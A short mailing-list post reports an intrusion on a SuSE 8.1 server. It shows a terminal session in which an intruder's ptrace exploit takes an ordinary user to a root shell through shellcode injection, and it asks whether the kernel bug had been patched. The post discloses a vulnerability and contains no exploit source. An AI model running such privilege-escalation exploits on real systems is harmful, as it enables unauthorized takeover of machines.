A suse 8.1 based server has been cracked, and the "visitor" left all his tools, so I've been able to play with it as well. The server was kept "up to date", but look at that: om@box:~/tmp> uname -a Linux box 2.4.19-4GB #1 Fri Sep 13 13:14:56 UTC 2002 i686 unknown om@box:~/tmp> cat /etc/issue Welcome to SuSE Linux 8.1 (i386) - Kernel \r (\l). om@box:~/tmp> rpm -qa|grep k_ k_deflt-2.4.19-340 om@box:~/tmp> id uid=400(om) gid=500(nofiles) groups=500(nofiles) om@box:~/tmp> ./ptrace [*] PID of Parent: 22768 [*] PID of Child: 22769 [*] Attaching to PID 22770 [*] Got registers! [!] EIP: 0x4000eaed [!] ESP: 0xbffffa48 [!] EBP: 0xffffffda [!] EAX: 0xbffffa8c [!] EBX: 0xbffffc74 [!] ECX: 0xbfffff7c [!] EDX: 0x400130ec [!] EDI: 0x00000000 [!] ESI: 0x400135fc [*] Injecting shellcode (0x4000eaed) [*] Detaching from PID 22770 [*] Voila baby, entering rootshell! sh-2.05b# [*] waiting for SIGCHLD... sh-2.05b# id uid=0(root2) gid=0(root) groups=500(nofiles) sh-2.05b# Well... I thought that ptrace problem has been fixed... ? (in suse 8.2 it's fine, the exploit is not working) Regards, Olivier -- _________________________________________________________________ Olivier Mueller - om@8304.ch - PGPkeyID: 0E84D2EA - Switzerland